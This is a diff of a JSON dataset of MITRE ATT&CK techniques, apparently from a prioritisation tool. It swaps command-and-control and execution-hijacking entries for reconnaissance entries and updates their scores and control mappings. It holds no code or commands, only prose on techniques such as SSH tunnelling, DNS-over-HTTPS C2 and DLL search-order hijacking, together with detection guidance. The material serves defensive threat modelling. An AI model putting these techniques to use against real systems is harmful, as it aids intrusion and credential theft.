-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.5580898685714285,
-        "adjusted_score": 0.5580898685714285,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "4.2",
-            "4.4",
-            "12.2",
-            "12.8",
-            "13.3",
-            "13.8"
-        ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-3",
-            "SI-4"
-        ],
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.22857142857142856,
-            "mitigation_score": 0.2545454545454545,
-            "detection_score": 0.2
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.07951844
+        "hardware_coverage": false
     },
     {
-        "tid": "T1572",
-        "name": "Protocol Tunneling",
-        "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ",
-        "url": "https://attack.mitre.org/techniques/T1572",
+        "tid": "T1588.006",
+        "name": "Obtain Capabilities: Vulnerabilities",
+        "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).",
+        "url": "https://attack.mitre.org/techniques/T1588/006",
         "tactics": [
-            "Command And Control"
+            "Resource Development"
         ],
-        "detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "PRE"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1588",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
-            },
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.4054811247619048,
-        "adjusted_score": 0.4054811247619048,
+        "cumulative_score": 0.06428571428571428,
+        "adjusted_score": 0.06428571428571428,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
+        "has_es_siem": false,
         "has_splunk": true,
-        "cis_controls": [
-            "4.2",
-            "4.4",
-            "7.7",
-            "9.3",
-            "13.3",
-            "13.4",
-            "13.8"
-        ],
-        "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-10",
-            "SI-15",
-            "SI-3",
-            "SI-4"
-        ],
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.20476190476190476,
-            "mitigation_score": 0.32727272727272727,
-            "detection_score": 0.07
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.00071922
+        "hardware_coverage": false
     },
     {
-        "tid": "T1573",
-        "name": "Encrypted Channel",
-        "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
-        "url": "https://attack.mitre.org/techniques/T1573",
+        "tid": "T1589",
+        "name": "Gather Victim Identity Information",
+        "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+        "url": "https://attack.mitre.org/techniques/T1589",
         "tactics": [
-            "Command And Control"
+            "Reconnaissance"
         ],
-        "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Network Traffic: Network Traffic Content"
+            "PRE"
         ],
+        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1573.001",
-                "name": "Encrypted Channel: Symmetric Cryptography",
-                "url": "https://attack.mitre.org/techniques/T1573/001",
-                "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
-                "detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "tid": "T1589.001",
+                "name": "Gather Victim Identity Information: Credentials",
+                "url": "https://attack.mitre.org/techniques/T1589/001",
+                "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1573.002",
-                "name": "Encrypted Channel: Asymmetric Cryptography",
-                "url": "https://attack.mitre.org/techniques/T1573/002",
-                "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).",
-                "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+                "tid": "T1589.002",
+                "name": "Gather Victim Identity Information: Email Addresses",
+                "url": "https://attack.mitre.org/techniques/T1589/002",
+                "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
+                    }
+                ]
+            },
+            {
+                "tid": "T1589.003",
+                "name": "Gather Victim Identity Information: Employee Names",
+                "url": "https://attack.mitre.org/techniques/T1589/003",
+                "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "mitigations": [
                     {
-                        "mid": "M1020",
-                        "name": "SSL/TLS Inspection",
-                        "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
-                        "url": "https://attack.mitre.org/mitigations/M1020"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            },
-            {
-                "mid": "M1020",
-                "name": "SSL/TLS Inspection",
-                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
-                "url": "https://attack.mitre.org/mitigations/M1020"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05476190476190476,
+        "adjusted_score": 0.05476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.0047619047619047615,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1589.001",
+        "name": "Gather Victim Identity Information: Credentials",
+        "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+        "url": "https://attack.mitre.org/techniques/T1589/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1589",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05476190476190476,
+        "adjusted_score": 0.05476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1589.002",
+        "name": "Gather Victim Identity Information: Email Addresses",
+        "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1589/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1589",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.22426968380952383,
-        "adjusted_score": 0.22426968380952383,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "13.3",
-            "13.8"
-        ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "SC-12",
-            "SC-16",
-            "SC-23",
-            "SC-7",
-            "SI-3",
-            "SI-4"
-        ],
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": false,
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.12380952380952381,
-            "mitigation_score": 0.23636363636363636
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00046016
+        "hardware_coverage": false
     },
     {
-        "tid": "T1574",
-        "name": "Hijack Execution Flow",
-        "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
-        "url": "https://attack.mitre.org/techniques/T1574",
+        "tid": "T1589.003",
+        "name": "Gather Victim Identity Information: Employee Names",
+        "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+        "url": "https://attack.mitre.org/techniques/T1589/003",
         "tactics": [
-            "Defense Evasion",
-            "Persistence",
-            "Privilege Escalation"
+            "Reconnaissance"
         ],
-        "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
-        "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Modification",
-            "Module: Module Load",
-            "Process: Process Creation",
-            "Service: Service Metadata",
-            "Windows Registry: Windows Registry Key Modification"
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1589",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1590",
+        "name": "Gather Victim Network Information",
+        "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+        "url": "https://attack.mitre.org/techniques/T1590",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
         ],
+        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1574.001",
-                "name": "Hijack Execution Flow: DLL Search Order Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1574/001",
-                "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
